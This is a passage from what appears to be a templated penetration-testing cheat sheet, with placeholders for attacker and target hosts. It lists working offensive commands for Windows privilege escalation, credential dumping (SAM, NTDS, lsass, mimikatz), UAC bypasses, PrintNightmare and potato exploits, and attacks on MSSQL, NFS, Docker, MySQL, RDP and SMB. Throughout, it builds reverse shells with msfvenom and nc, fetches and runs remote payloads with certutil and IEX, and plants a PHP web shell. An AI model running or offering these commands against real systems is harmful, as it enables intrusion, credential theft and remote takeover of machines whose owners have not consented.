{{LPORT}}; run" 
msfconsole -q -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS {{RHOSTS}}; set SITEPATH /var/www/html; set LHOST {{LHOST}}; run" nc {{RHOST}} {{RPORT}}
SITE CPFR /etc/passwd
SITE CPTO /tmp/passwd.copy curl "{{URL}}/shell.php?cmd=id" reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f msi -o evil.msi msfvenom -p windows/adduser USER=hacker PASS=Passw0rd123! -f msi -o adduser.msi iwr -Uri {{URL}}/evil.msi -OutFile C:\Windows\Temp\evil.msi msiexec /quiet /qn /i C:\Windows\Temp\evil.msi powerpick Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer','HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -EA SilentlyContinue whoami /priv | findstr /i "SeAssignPrimaryToken SeImpersonate" C:\Windows\Temp\ps.exe -i -c cmd C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c whoami" msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\rev.exe" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select-Object DefaultUserName,DefaultDomainName,DefaultPassword,AutoAdminLogon netexec smb {{RHOST}} -u {{USER}} -p {{PASS}} -M autologon runas /user:RECOVERED_USER cmd.exe evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run Get-CimInstance Win32_StartupCommand | Select-Object Name,Command,Location,User | Format-List icacls "C:\Program Files\Vendor\autostart.exe" Get-Acl 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' | Format-List msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o autostart.exe reg add 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\autostart.exe" /f $env:Path -split ';' | ForEach-Object { if ($_ -and (Test-Path $_)) { icacls $_ } } powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Find-PathDLLHijack" accesschk.exe -accepteula -uwdq "C:\Path\To\AppDir" Procmon64.exe /AcceptEula msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o hijack.dll Copy-Item .\hijack.dll 'C:\Path\To\WritableDir\MISSING.dll'; Get-Service 'VulnSvc' | Restart-Service -Force Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch 'C:\\Windows' -and $_.StartName -eq 'LocalSystem' } | Select Name,PathName,StartName whoami /priv whoami /all systeminfo [System.Environment]::OSVersion.Version; (Get-CimInstance Win32_OperatingSystem).Caption; Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 15 certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/winPEASx64.exe C:\Windows\Temp\winpeas.exe C:\Windows\Temp\winpeas.exe quiet cmd fast IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/winPEAS.ps1') IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/PowerUp.ps1'); Invoke-AllChecks C:\Windows\Temp\Seatbelt.exe -group=all accesschk.exe /accepteula -uwcqv "Users" * accesschk.exe /accepteula -wvu "Everyone" "C:\Program Files\VulnApp" reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated impacket-smbserver share $(pwd) -smb2support icacls C:\Windows\System32\config\SAM vssadmin list shadows copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Temp\SECURITY impacket-secretsdump -sam SAM 
-system SYSTEM -security SECURITY LOCAL Invoke-WebRequest -Uri {{URL}}/HiveNightmare.exe -OutFile C:\Temp\hn.exe; C:\Temp\hn.exe netexec smb {{RHOST}} -u Administrator -H {{NTHASH}} evil-winrm -i {{RHOST}} -u Administrator -H {{NTHASH}} systeminfo wmic qfe get Caption,Description,HotFixID,InstalledOn Get-HotFix | Sort-Object InstalledOn -Descending wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only wes.py --update && wes.py systeminfo.txt Watson.exe searchsploit windows kernel local privilege escalation searchsploit -m windows/local/<edb-id> certutil -urlcache -split -f {{URL}}/exploit.exe C:\Temp\exploit.exe C:\Temp\exploit.exe "cmd /c whoami" sc query spooler reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" netexec smb {{RHOST}} -u {{USER}} -p {{PASS}} -M printnightmare impacket-rpcdump @{{RHOST}} | egrep -i 'MS-RPRN|MS-PAR' msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o /tmp/nightmare.dll impacket-smbserver share /tmp -smb2support python3 CVE-2021-1675.py {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} '\\{{LHOST}}\share\nightmare.dll' Import-Module .\CVE-2021-1675.ps1; Invoke-Nightmare -DriverName 'PrintMe' -NewUser 'pwn' -NewPassword 'Pwn123!' 
Import-Module .\CVE-2021-1675.ps1; Invoke-Nightmare -DLL 'C:\Temp\nightmare.dll' Stop-Service -Name Spooler -Force; Set-Service -Name Spooler -StartupType Disabled schtasks /query /fo LIST /v Get-ScheduledTask | Where-Object {$_.Principal.UserId -match 'SYSTEM|Administrator'} | Select-Object TaskName,TaskPath,@{n='RunAs';e={$_.Principal.UserId}} Get-ScheduledTask -TaskName 'VulnTask' | Select-Object -ExpandProperty Actions icacls "C:\Scripts\backup.bat" echo C:\Windows\Temp\rev.exe >> C:\Scripts\backup.bat msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe schtasks /run /tn "VulnTask" Get-ChildItem C:\Windows\System32\Tasks -Recurse | Select-Object FullName whoami /priv | findstr /i "SeBackup SeRestore" reg save HKLM\SAM C:\Temp\SAM.hive && reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive reg save HKLM\SECURITY C:\Temp\SECURITY.hive impacket-secretsdump -sam SAM.hive -system SYSTEM.hive -security SECURITY.hive LOCAL echo set context persistent nowriters > C:\Temp\sh.txt & echo add volume c: alias raj >> C:\Temp\sh.txt & echo create >> C:\Temp\sh.txt & echo expose %raj% z: >> C:\Temp\sh.txt & diskshadow /s C:\Temp\sh.txt robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit impacket-secretsdump -ntds ntds.dit -system SYSTEM.hive LOCAL evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} smbclient //{{RHOST}}/C$ -U {{DOMAIN}}/{{USER}}%{{PASS}} -c "cd Temp; get SAM.hive; get SYSTEM.hive; get ntds.dit" whoami /priv | findstr /i "SeDebug" privilege::debug token::elevate sekurlsa::logonpasswords incognito.exe list_tokens -u incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full pypykatz lsa minidump lsass.dmp RunasCs.exe {{USER}} {{PASS}} cmd.exe whoami /priv | findstr /i "impersonate primarytoken" certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/PrintSpoofer64.exe C:\Windows\Temp\ps.exe C:\Windows\Temp\ps.exe -i -c cmd 
C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\rev.exe" C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c whoami" C:\Windows\Temp\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe {{LHOST}} {{LPORT}} -e cmd" C:\Windows\Temp\RoguePotato.exe -r {{LHOST}} -e "C:\Windows\Temp\rev.exe" -l 9999 socat tcp-listen:135,reuseaddr,fork tcp:{{RHOST}}:9999 C:\Windows\Temp\EfsPotato.exe "whoami" C:\Windows\Temp\JuicyPotatoNG.exe -t * -p "C:\Windows\Temp\rev.exe" cmdkey /list runas /savecred /user:ADMIN_USER "C:\Windows\Temp\rev.exe" Get-ChildItem C:\ -Include unattend.xml,sysprep.xml,sysprep.inf,Autounattend.xml,Unattended.xml -File -Recurse -EA SilentlyContinue findstr /si password *.xml *.ini *.config *.txt 2>nul findstr /s /i cpassword \\{{DOMAIN}}\sysvol\{{DOMAIN}}\policies\*.xml netexec smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_password gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword netsh wlan show profile name="SSID" key=clear reg save HKLM\SAM C:\Windows\Temp\sam.save && reg save HKLM\SYSTEM C:\Windows\Temp\system.save impacket-secretsdump -sam sam.save -system system.save LOCAL impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} whoami /groups | findstr /i "Label" net localgroup administrators reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe /c start cmd.exe" /f & reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f & start fodhelper.exe reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe /c start cmd.exe" /f & reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f & start computerdefaults.exe reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c start cmd.exe" /f & start 
eventvwr.exe reg add HKCU\Software\Classes\exefile\shell\runas\command /v IsolatedCommand /t REG_SZ /d "cmd.exe /c start cmd.exe" /f & start sdclt.exe reg delete HKCU\Software\Classes\ms-settings /f & reg delete HKCU\Software\Classes\mscfile /f reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('{{URL}}')" /f & reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f & start fodhelper.exe wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\"" sc qc "VulnSvc" Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and $_.PathName -notmatch 'C:\\Windows' } | Select-Object Name,PathName,StartName,StartMode icacls "C:\Program Files\My App" accesschk.exe -accepteula -uwdq "C:\Program Files\My App" msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o My.exe smbclient //{{RHOST}}/share -U '{{USER}}%{{PASS}}' -c 'put My.exe' sc stop "VulnSvc" & sc start "VulnSvc" accesschk.exe -accepteula -uvwqk HKLM\System\CurrentControlSet\Services Get-Acl HKLM:\System\CurrentControlSet\Services\VulnSvc | Format-List; (Get-Acl HKLM:\System\CurrentControlSet\Services\VulnSvc).Access | Where-Object { $_.RegistryRights -match 'WriteKey|SetValue|FullControl' } powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Get-ModifiableRegistryAutoRun; Get-RegistryAlwaysInstallElevated" reg query HKLM\System\CurrentControlSet\Services\VulnSvc reg add HKLM\System\CurrentControlSet\Services\VulnSvc /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\rev.exe" /f reg add HKLM\System\CurrentControlSet\Services\VulnSvc /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\cmd.exe /c net localgroup administrators {{USER}} /add" /f msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe 
sc stop "VulnSvc" & sc start "VulnSvc" accesschk.exe -accepteula -uwcqv "%USERNAME%" * accesschk.exe -accepteula -uwcqv "Authenticated Users" * Get-Service | ForEach-Object { $_.Name }; sc.exe sdshow VulnSvc powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Get-ModifiableService" sc qc "VulnSvc" sc config "VulnSvc" binPath= "C:\Windows\System32\cmd.exe /c net localgroup administrators {{USER}} /add" start= demand obj= LocalSystem sc config "VulnSvc" binPath= "C:\Windows\Temp\rev.exe" sc stop "VulnSvc" & sc start "VulnSvc" powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-ServiceAbuse -Name 'VulnSvc' -UserName '{{DOMAIN}}\{{USER}}'" nmap -p110,995 -sV -sC --script pop3-capabilities,pop3-ntlm-info -oA nmap_pop3_{{RHOST}} {{RHOST}} nc -nv {{RHOST}} 110 openssl s_client -connect {{RHOST}}:995 -crlf -quiet nc -nv {{RHOST}} 110
USER {{USER}}
PASS {{PASS}}
LIST
RETR 1
QUIT hydra -L {{WORDLIST}} -P {{WORDLIST}} -f {{RHOST}} pop3 hydra -l {{USER}} -P {{WORDLIST}} -f {{RHOST}} pop3s rpcinfo -p {{RHOST}} rpcinfo {{RHOST}} nmap -p111 -sV --script rpcinfo {{RHOST}} nmap -sSU -p111 {{RHOST}} showmount -e {{RHOST}} nmap -sV -p {{RPORT}} --script=memcached-info {{RHOST}} ncat -C {{RHOST}} {{RPORT}} memcstat --servers={{RHOST}}:{{RPORT}} printf 'stats\r\nstats items\r\nstats slabs\r\n' | ncat -C {{RHOST}} {{RPORT}} printf 'stats cachedump 1 0\r\n' | ncat -C {{RHOST}} {{RPORT}} printf 'get KEYNAME\r\n' | ncat -C {{RHOST}} {{RPORT}} nmap -sV -Pn -p 1099 --script rmi-dumpregistry,rmi-vuln-classloader {{RHOST}} rmg enum {{RHOST}} {{RPORT}} rmg guess {{RHOST}} {{RPORT}} java -jar BaRMIe.jar -enum {{RHOST}} {{RPORT}} rmg serial {{RHOST}} {{RPORT}} CommonsCollections6 'nc {{LHOST}} {{LPORT}} -e /bin/sh' --bound-name jmxrmi java -jar BaRMIe.jar -attack {{RHOST}} {{RPORT}} impacket-rpcdump @{{RHOST}} rpcdump.py @{{RHOST}} | grep -E 'MS-RPRN|MS-EFSR|MS-TSCH|MS-SCMR' nmap -n -sV -p135 --script msrpc-enum,rpc-grind {{RHOST}} impacket-wmiexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-wmiexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-dcomexec -object MMC20 {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} netexec wmi {{RHOST}} -u {{USER}} -p '{{PASS}}' -x 'whoami' nmap -p143,993 -sV -sC --script imap-capabilities,imap-ntlm-info -oA nmap_imap_{{RHOST}} {{RHOST}} nc -nv {{RHOST}} 143 openssl s_client -connect {{RHOST}}:993 -crlf -quiet nc -nv {{RHOST}} 143
a LOGIN {{USER}} {{PASS}}
a LIST "" "*"
a SELECT INBOX
a FETCH 1 BODY[]
a LOGOUT hydra -L {{WORDLIST}} -P {{WORDLIST}} -f {{RHOST}} imap hydra -l {{USER}} -P {{WORDLIST}} -f {{RHOST}} imaps curl -k 'imaps://{{RHOST}}/INBOX' --user '{{USER}}:{{PASS}}' -X 'FETCH 1 BODY[]' nmap -p1433 -sV --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password {{RHOST}} -oN mssql_enum.txt netexec mssql {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}} -windows-auth impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}} impacket-mssqlclient {{DOMAIN}}/{{USER}}@{{RHOST}} -k -no-pass EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; xp_cmdshell powershell -e {{URL}} EXEC master..xp_dirtree '\\{{LHOST}}\\share\\x', 1, 1; sudo responder -I {{INTERFACE}} EXEC sp_linkedservers; SELECT * FROM master..sysservers; EXEC ('sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami''') AT [LINKED-SQL]; EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin'); nmap -sV -p {{RPORT}} --script=oracle-tns-version,oracle-sid-brute {{RHOST}} tnscmd10g version -h {{RHOST}} -p {{RPORT}} tnscmd10g status -h {{RHOST}} -p {{RPORT}} odat all -s {{RHOST}} -p {{RPORT}} odat sidguesser -s {{RHOST}} -p {{RPORT}} odat passwordguesser -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} --accounts-file accounts/accounts_multiple.txt sqlplus {{USER}}/{{PASS}}@{{RHOST}}:{{RPORT}}/{{DOMAIN}} odat utlfile -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} -U {{USER}} -P {{PASS}} --putFile /tmp sh.sh ./sh.sh odat externaltable -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} -U {{USER}} -P {{PASS}} --exec /tmp sh.sh nmap -sU -p 161 -sV --script snmp-info,snmp-sysdescr {{RHOST}} onesixtyone -c {{WORDLIST}} {{RHOST}} snmpwalk -v2c -c public {{RHOST}} snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.4.1.77.1.2.25 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.25.4.2.1.2 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.25.4.2.1.5 snmpwalk -v2c -c public {{RHOST}} 
1.3.6.1.2.1.25.6.3.1.2 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.6.13.1.3 snmp-check -c public {{RHOST}} snmpbulkwalk -v2c -c public -Cr1000 {{RHOST}} .1 snmpwalk -v3 -l authPriv -u {{USER}} -a SHA -A {{PASS}} -x AES -X {{PASS}} {{RHOST}} showmount -e {{RHOST}} nmap -p111,2049 -sV --script nfs-showmount,nfs-ls,nfs-statfs {{RHOST}} sudo mount -t nfs -o vers=3 {{RHOST}}:/export /mnt/nfs sudo mount -t nfs -o vers=3,nolock {{RHOST}}:/home /mnt/nfs cp /bin/bash /mnt/nfs/rootbash; chmod +s /mnt/nfs/rootbash /mnt/nfs/rootbash -p nmap -p21 -sV -sC {{RHOST}} nmap -p21 --script ftp-anon,ftp-bounce,ftp-syst {{RHOST}} ftp {{RHOST}} wget -m --no-passive ftp://anonymous:anonymous@{{RHOST}} binary hydra -L {{WORDLIST}} -P {{WORDLIST}} -f -t 4 ftp://{{RHOST}} hydra -l {{USER}} -P {{WORDLIST}} ftp://{{RHOST}} -t 4 nmap -b anonymous:anonymous@{{RHOST}} -p1-1024 {{DC_IP}} nmap -p 22 -sV -sC {{RHOST}} nmap -p 22 --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey,sshv1 {{RHOST}} nc {{RHOST}} {{RPORT}} ssh -v {{USER}}@{{RHOST}} -p {{RPORT}} ssh-audit {{RHOST}}:{{RPORT}} hydra -L {{WORDLIST}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}} hydra -l {{USER}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}} crackmapexec ssh {{RHOST}} -u {{USER}} -p {{PASS}} ssh-keygen -lf {{WORDLIST}} ssh2john id_rsa > hash.txt && john --wordlist={{WORDLIST}} hash.txt chmod 600 id_rsa && ssh -i id_rsa {{USER}}@{{RHOST}} -p {{RPORT}} python3 ssh_enum.py {{RHOST}} {{WORDLIST}} ssh -L {{LPORT}}:127.0.0.1:{{RPORT}} {{USER}}@{{RHOST}} ssh -D {{LPORT}} {{USER}}@{{RHOST}} ssh -R {{RPORT}}:127.0.0.1:{{LPORT}} {{USER}}@{{RHOST}} nmap -p 23 -sV -sC {{RHOST}} nmap -p 23 --script telnet-ntlm-info,telnet-encryption {{RHOST}} telnet {{RHOST}} {{RPORT}} nc {{RHOST}} {{RPORT}} hydra -L {{WORDLIST}} -P {{WORDLIST}} -t 4 telnet://{{RHOST}}:{{RPORT}} hydra -l {{USER}} -P {{WORDLIST}} telnet://{{RHOST}}:{{RPORT}} telnet {{RHOST}} {{RPORT}} # login: {{USER}} / {{PASS}} sudo tcpdump -i {{INTERFACE}} -A 'tcp port 23' -w 
telnet.pcap nmap -sV -Pn -p 2375,2376 {{RHOST}} curl -s http://{{RHOST}}:2375/version docker -H tcp://{{RHOST}}:2375 info docker -H tcp://{{RHOST}}:2375 images docker -H tcp://{{RHOST}}:2375 run --rm -v /:/mnt -it alpine chroot /mnt sh docker -H tcp://{{RHOST}}:2375 run --rm -v /:/mnt alpine sh -c "cat /mnt/etc/shadow" docker -H tcp://{{RHOST}}:2375 run --rm --privileged --net=host --pid=host -it alpine nsenter -t 1 -m -u -n -i sh nmap -p25,465,587 -sV -sC --script smtp-commands,smtp-open-relay,smtp-enum-users,smtp-ntlm-info -oA nmap_smtp_{{RHOST}} {{RHOST}} nc -nv {{RHOST}} 25 telnet {{RHOST}} 25 smtp-user-enum -M VRFY -U {{WORDLIST}} -t {{RHOST}} smtp-user-enum -M RCPT -U {{WORDLIST}} -t {{RHOST}} -D {{DOMAIN}} smtp-user-enum -M EXPN -U {{WORDLIST}} -t {{RHOST}} swaks --to {{USER}}@{{DOMAIN}} --from attacker@{{DOMAIN}} --server {{RHOST}} --body 'test' swaks --from attacker@evil.com --to victim@external.com --server {{RHOST}} swaks --to {{USER}}@{{DOMAIN}} --server {{RHOST}} --auth LOGIN --auth-user {{USER}} --auth-password {{PASS}} nmap -sV -p {{RPORT}} --script=mongodb-info,mongodb-databases {{RHOST}} mongosh mongodb://{{RHOST}}:{{RPORT}} mongosh mongodb://{{USER}}:{{PASS}}@{{RHOST}}:{{RPORT}}/admin mongosh mongodb://{{RHOST}}:{{RPORT}} --eval 'db.adminCommand({listDatabases:1})' mongosh mongodb://{{RHOST}}:{{RPORT}}/DBNAME --eval 'db.getCollectionNames().forEach(c=>printjson(db[c].find().toArray()))' mongo {{RHOST}}:{{RPORT}}/admin --eval 'db.system.users.find()' ldapsearch -x -H ldap://{{DC_IP}}:3268 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName ldapsearch -x -H ldap://{{DC_IP}}:3268 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b '' '(&(objectCategory=person)(objectClass=user)(adminCount=1))' sAMAccountName memberOf nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --port 3268 --users ldapsearch -x -H ldap://{{DC_IP}}:3268 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b '' '(objectClass=trustedDomain)' trustPartner 
trustDirection trustAttributes LDAPTLS_REQCERT=never ldapsearch -x -H ldaps://{{DC_IP}}:3269 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b '' '(objectClass=user)' sAMAccountName nmap -sV -p {{RPORT}} --script=mysql-info,mysql-empty-password,mysql-users,mysql-databases,mysql-variables,mysql-audit,mysql-dump-hashes,mysql-enum {{RHOST}} mysql -h {{RHOST}} -P {{RPORT}} -u {{USER}} -p'{{PASS}}' mysql -h {{RHOST}} -P {{RPORT}} -u root --password='' hydra -L {{WORDLIST}} -P {{WORDLIST}} {{RHOST}} mysql mysql -h {{RHOST}} -u {{USER}} -p'{{PASS}}' -e 'show databases; select user,authentication_string from mysql.user;' mysql -h {{RHOST}} -u {{USER}} -p'{{PASS}}' -e "select load_file('/etc/passwd');" mysql -h {{RHOST}} -u {{USER}} -p'{{PASS}}' -e "select '<?php system($_GET[0]); ?>' INTO OUTFILE '/var/www/html/sh.php';" sqlmap -d "mysql://{{USER}}:{{PASS}}@{{RHOST}}:{{RPORT}}/database" --os-shell nmap -p3389 -sV --script rdp-ntlm-info,rdp-enum-encryption {{RHOST}} -oN rdp_enum.txt nmap -p3389 --script rdp-vuln-ms12-020 {{RHOST}} netexec rdp {{RHOST}} -u {{USER}} -p {{PASS}} netexec rdp {{RHOST}} -u {{USER}} -H {{NTHASH}} xfreerdp /v:{{RHOST}} /u:{{USER}} /p:{{PASS}} /cert:ignore +clipboard /dynamic-resolution /drive:share,/home/kali/share xfreerdp /v:{{RHOST}} /u:{{USER}} /pth:{{NTHASH}} /cert:ignore +clipboard /dynamic-resolution xfreerdp /v:{{RHOST}} /d:{{DOMAIN}} /u:{{USER}} /p:{{PASS}} /cert:ignore /dynamic-resolution reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" && net start sesshijack hydra -L {{WORDLIST}} -p {{PASS}} rdp://{{RHOST}} msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS {{RHOST}}; run" ldapsearch -x -H ldap://{{DC_IP}} -s base namingcontexts ldapsearch -x -H ldap://{{DC_IP}} -b 'DC={{DOMAIN}}' '(objectClass=*)' ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 
'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName description memberOf ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(&(objectClass=user)(servicePrincipalName=*))' sAMAccountName servicePrincipalName ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' sAMAccountName nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --users --groups nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M get-desc-users nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M laps bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} -c All --zip windapsearch -d {{DOMAIN}} --dc {{DC_IP}} -u '{{USER}}@{{DOMAIN}}' -p '{{PASS}}' --da rpcclient -U '' -N {{DC_IP}} -c 'enumdomusers' netexec smb {{RHOST}} netexec smb {{RHOST}} -u '' -p '' --shares enum4linux-ng -A {{RHOST}} smbclient -L //{{RHOST}}/ -N smbmap -H {{RHOST}} -u '{{USER}}' -p '{{PASS}}' smbclient //{{RHOST}}/SHARE -U '{{DOMAIN}}\{{USER}}%{{PASS}}' netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' --shares --users --groups --pass-pol netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' --rid-brute netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' -M spider_plus nmap -n -p445 --script smb-vuln-ms17-010 {{RHOST}} netexec smb {{RHOSTS}} -M ms17-010 msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS {{RHOST}}; set LHOST {{LHOST}}; run' netexec smb {{RHOST}} -u '{{USER}}' -H {{NTHASH}} impacket-psexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-smbexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-secretsdump {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-secretsdump -just-dc -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{DC_IP}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} rpcclient -U '{{DOMAIN}}/{{USER}}%{{PASS}}' {{DC_IP}} -c 'setuserinfo2 TARGET_USER 23 NewP@ss123!' 
